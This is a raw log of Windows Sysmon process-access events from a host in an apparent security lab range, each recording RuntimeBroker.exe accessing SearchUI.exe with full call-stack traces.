13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
